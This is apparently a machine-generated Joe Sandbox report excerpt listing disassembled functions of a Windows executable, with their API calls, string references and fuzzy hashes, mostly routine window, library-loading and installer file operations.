Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD

Function 0049378C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll), ref: 0049379C
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004937A9
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004937B6

Strings

user32.dll, xrefs: 00493797
GetMonitorInfoA, xrefs: 004937B0
MonitorFromRect, xrefs: 004937A3

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
API String ID: 667068680-2254406584
Opcode ID: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
Instruction ID: addf7fefb297577c5f12cb6f7e4bbe149f94bc2dbc72dea36d33d0c0dd90845d
Opcode Fuzzy Hash: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
Instruction Fuzzy Hash: 74F0F6D274171467DA2069F60C82F7BAACCDB93762F148077BD05A7382E99D8E0542FE

Function 004571F0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457220
GetExitCodeProcess.KERNEL32(?,lI), ref: 00457241
CloseHandle.KERNEL32(?,00457274,?,?,00457A8F,00000000,00000000), ref: 00457267

Strings

MsgWaitForMultipleObjects, xrefs: 0045722D
lI, xrefs: 00457237, 0045723A
GetExitCodeProcess, xrefs: 0045724A

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseCodeExitHandleMultipleObjectsProcessWait
String ID: lI$GetExitCodeProcess$MsgWaitForMultipleObjects
API String ID: 2573145106-911929905
Opcode ID: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
Instruction ID: 5860e754879763acac88ff1443aad6da1c0af202f9247d34d09c584a8b2c0160
Opcode Fuzzy Hash: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
Instruction Fuzzy Hash: 7501A234608204AFDF20EB999D42E1A73E8EB4A714F2041F7F810D73D2DA7C9D04D658

Function 0045CDA8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(03100000,BZ2_bzDecompressInit), ref: 0045CDB1
GetProcAddress.KERNEL32(03100000,BZ2_bzDecompress), ref: 0045CDC1
GetProcAddress.KERNEL32(03100000,BZ2_bzDecompressEnd), ref: 0045CDD1

Strings

BZ2_bzDecompress, xrefs: 0045CDBB
BZ2_bzDecompressEnd, xrefs: 0045CDCB
BZ2_bzDecompressInit, xrefs: 0045CDAB

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc
String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
API String ID: 190572456-212574377
Opcode ID: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
Instruction ID: 1838bd6a3fc69983aea635b8e0361122e28d55063b6a1ad71f1ff2e1482e7c5d
Opcode Fuzzy Hash: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
Instruction Fuzzy Hash: 86F0A9B05007009FDB24DB26BEC67272AA7E7A4746F14843BD819A6263F77C045DCA5C

Function 0042E890 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderwindowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,0047F8E7), ref: 0042E8A9
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E8AF
InterlockedExchange.KERNEL32(0049A668,00000001), ref: 0042E8C0

Part of subcall function 0042E820: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
Part of subcall function 0042E820: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
Part of subcall function 0042E820: InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D

ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E8D4

Strings

user32.dll, xrefs: 0042E8A4
ChangeWindowMessageFilterEx, xrefs: 0042E89F

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
String ID: ChangeWindowMessageFilterEx$user32.dll
API String ID: 142928637-2676053874
Opcode ID: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
Instruction ID: c365c5bc722f159dc4e6bf90002f67a18111edd1cc3b7a2fef3254202be3c5aa
Opcode Fuzzy Hash: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
Instruction Fuzzy Hash: 02E092A1341720AAEB1077B77C8AF9A2258CB11729F5C4037F180A61D2C6BD0C90CE9E

Function 004776C8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB

Strings

kernel32.dll, xrefs: 004776C9
VerifyVersionInfoW, xrefs: 004776E5
VerSetConditionMask, xrefs: 004776D5

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
API String ID: 667068680-222143506
Opcode ID: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
Instruction ID: cfeeddb06e0de6ce6ebab5647243e6050a865ade16457065002c887e192085cf
Opcode Fuzzy Hash: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
Instruction Fuzzy Hash: 1BC012E0245700EDDA00B7F12CC3D772558D550F24750843B705879183D77C1C008F2C

Function 0041B67C Relevance: 9.1, APIs: 6, Instructions: 144windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041B755
73E9A570.USER32(?), ref: 0041B761
73E98830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
73E922A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
73E98830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: E98830$A570A6310E922Focus
String ID:
API String ID: 184897721-0
Opcode ID: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
Opcode Fuzzy Hash: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9

Function 0041B94C Relevance: 9.1, APIs: 6, Instructions: 142windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041BA27
73E9A570.USER32(?), ref: 0041BA33
73E98830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
73E922A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
73E98830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: E98830$A570A6310E922Focus
String ID:
API String ID: 184897721-0
Opcode ID: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
Opcode Fuzzy Hash: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4

Function 0041B518 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041B58E
73E9A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
73EA4620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
73ECE680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
73ECE680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
73E9A480.USER32(?,?,0041B643,?,?), ref: 0041B636

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: E680$A4620A480A570Focus
String ID:
API String ID: 2226671993-0
Opcode ID: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
Opcode Fuzzy Hash: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5

Function 0045C76C Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
SetLastError.KERNEL32(00000000,00000002,?,?,?,0045C8A4,?,00000000,0045C838,?,?,?,?,00000000), ref: 0045C816

Strings

USERS, xrefs: 0045C7C9
CURRENT_USER, xrefs: 0045C7AB
MACHINE, xrefs: 0045C7BA
CLASSES_ROOT, xrefs: 0045C79C

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLast
String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
API String ID: 1452528299-1580325520
Opcode ID: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
Instruction ID: f1a5a0da2dcc97a3faf8a15e8aeeb0a96b83315a605ea6bcd06888aa97a57620
Opcode Fuzzy Hash: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
Instruction Fuzzy Hash: 3111D835200305BFD711EAA1C9C1A9ABAACDB48707F6040776D0092783D73C9F0AD96D

Function 0041BD9C Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
73E9A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
73EA4620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
73EA4620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
73E9A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: A4620MetricsSystem$A480A570
String ID:
API String ID: 4120540252-0
Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9

Function 0047CC90 Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EC), ref: 0047CC9E
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046BD7C), ref: 0047CCC4
GetWindowLongA.USER32(?,000000EC), ref: 0047CCD4
SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047CCF5
ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047CD09
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047CD25

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$Long$Show
String ID:
API String ID: 3609083571-0
Opcode ID: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
Instruction ID: b9d10cbe0955a365ec79174b91f205d0e2d6322d15c7b647bae3529478a090fa
Opcode Fuzzy Hash: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
Instruction Fuzzy Hash: 9A010CB5651210ABD710D7A8CD81F663798AB1D334F09067AB999DF2E2C629DC108B49

Function 0041B280 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B

UnrealizeObject.GDI32(00000000), ref: 0041B28C
SelectObject.GDI32(?,00000000), ref: 0041B29E
SetBkColor.GDI32(?,00000000), ref: 0041B2C1
SetBkMode.GDI32(?,00000002), ref: 0041B2CC
SetBkColor.GDI32(?,00000000), ref: 0041B2E7
SetBkMode.GDI32(?,00000001), ref: 0041B2F2

Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D

Function 00452F1C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B

Strings

.tmp, xrefs: 00452FBF
$pI, xrefs: 00452FAD
}RI, xrefs: 00452F4C, 00452F57, 00452FB2, 00452FBC, 00452F8C, 00452F96

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: $pI$.tmp$}RI
API String ID: 3498533004-1860564545
Opcode ID: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
Instruction ID: 59b3140617fbadefd4c9ffb48c61b81df6a531bfad3e19e72d5fef91abd571f9
Opcode Fuzzy Hash: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
Instruction Fuzzy Hash: 0031A770A00219ABCB11EF95D942B9FBBB5AF45715F60412BF800B73C2D6785F0587AD

Function 00496220 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC

ShowWindow.USER32(?,00000005,00000000,00496485,?,?,00000000), ref: 00496256

Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3

Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB

Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D

Strings

.msg, xrefs: 004962BC
.dat, xrefs: 0049629D
Uninstall, xrefs: 0049623C
IMsg, xrefs: 0049632A

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
String ID: .dat$.msg$IMsg$Uninstall
API String ID: 3312786188-1660910688
Opcode ID: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
Instruction ID: 58d6af22fd8ad1ff54f71e35ba593e4f31a3bf997598853b00730072561c9efa
Opcode Fuzzy Hash: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
Instruction Fuzzy Hash: C4319234A006149FCB00FFA5DD5295E7BB5FB48708F51847AF800A73A2CB78AD049B9C

Function 004966D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 00496744
SetFileAttributesA.KERNEL32(00000000,00000000,00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 0049676D
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00496786

Strings

$pI, xrefs: 00496713, 0049672D, 004967BC, 00496716
isRS-%.3u.tmp, xrefs: 00496723

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

